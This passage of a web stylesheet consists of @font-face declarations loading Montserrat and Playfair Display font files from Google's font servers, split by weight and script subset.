normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: 